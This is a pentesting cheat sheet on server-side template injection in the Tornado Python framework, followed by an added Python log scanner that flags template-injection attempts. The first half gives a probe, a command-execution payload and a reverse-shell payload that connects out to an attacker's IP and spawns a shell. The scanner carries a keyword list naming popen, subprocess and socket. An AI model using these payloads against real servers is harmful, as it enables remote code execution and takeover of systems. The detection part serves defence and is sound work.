Tornado Pentesting

Last modified: 2023-05-28


Tornado is a Python web server and web application framework.

Server-Side Template Injection (SSTI)

If user-controlled input is compiled as part of a Tornado template, we can execute arbitrary Python code through server-side template injection.
First, check whether template expressions are evaluated by injecting a probe such as the following.

<title>Website by {{ 2*3 }}</title>
<span>{{ 2*3 }}</span>

# URL parameters
{{2*3}}

If the website shows 6 instead of 2*3, the input is being evaluated as a template expression and we can execute arbitrary code.
Try the following payloads.

{% import os %}{{ os.popen("whoami").read() }}

# Reverse shell. Replace "" with your own IP address.
# It requires a listener like `nc -lvnp 4444` in the local terminal.
{% import socket,subprocess,os %}{{ s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"]) }}
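From the defending side, the probe and payloads above leave a recognisable trace in access logs: Tornado's `{{ }}` and `{% %}` delimiters inside request parameters. The following is an added detection example (not part of the original cheat sheet); it scans constructed sample log lines, URL-decodes each request path and grades anything containing template syntax as a harmless template string, an arithmetic probe, or a code-execution attempt. The log format, field names and keyword list are assumptions.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic), common log format.
SAMPLE_LOG = """\
10.0.0.5 - - [28/May/2023:10:01:02 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.9 - - [28/May/2023:10:01:07 +0000] "GET /?name=%7B%7B2*3%7D%7D HTTP/1.1" 200 498
10.0.0.9 - - [28/May/2023:10:01:15 +0000] "GET /?name=%7B%25%20import%20os%20%25%7D%7B%7B%20os.popen(%22whoami%22).read()%20%7D%7D HTTP/1.1" 200 530
10.0.0.7 - - [28/May/2023:10:02:00 +0000] "GET /search?q=%7B%7Bbrand%7D%7D HTTP/1.1" 200 300
"""

REQ_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*"')
# Tornado template delimiters: {{ expr }} evaluates an expression, {% ... %} runs a directive.
EXPR_RE = re.compile(r"\{\{.*?\}\}", re.S)
DIRECTIVE_RE = re.compile(r"\{%.*?%\}", re.S)
# The classic probe is a small arithmetic expression inside {{ }}: {{2*3}}, {{ 7*7 }}, ...
PROBE_RE = re.compile(r"\{\{\s*\d+\s*[*+\-/]\s*\d+\s*\}\}")
# Keywords (assumed list) that indicate an attempt to reach the interpreter from a template.
RCE_HINTS = ("import", "os.", "popen", "subprocess", "socket", "__import__", "eval(")


def classify(value: str) -> Optional[str]:
    """Return 'rce', 'probe', 'template-syntax' or None for a decoded parameter value."""
    if not (EXPR_RE.search(value) or DIRECTIVE_RE.search(value)):
        return None
    lowered = value.lower()
    if DIRECTIVE_RE.search(value) or any(h in lowered for h in RCE_HINTS):
        return "rce"
    if PROBE_RE.search(value):
        return "probe"
    return "template-syntax"


def scan_log(text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, verdict, decoded request path) for each suspicious request."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue
        decoded = unquote_plus(m.group("path"))  # payloads arrive percent-encoded
        verdict = classify(decoded)
        if verdict:
            findings.append((m.group("ip"), verdict, decoded))
    return findings
```

A plain `{{brand}}` in a search box is graded as low-severity template syntax rather than an attack, so the rule can be tuned without drowning in false positives.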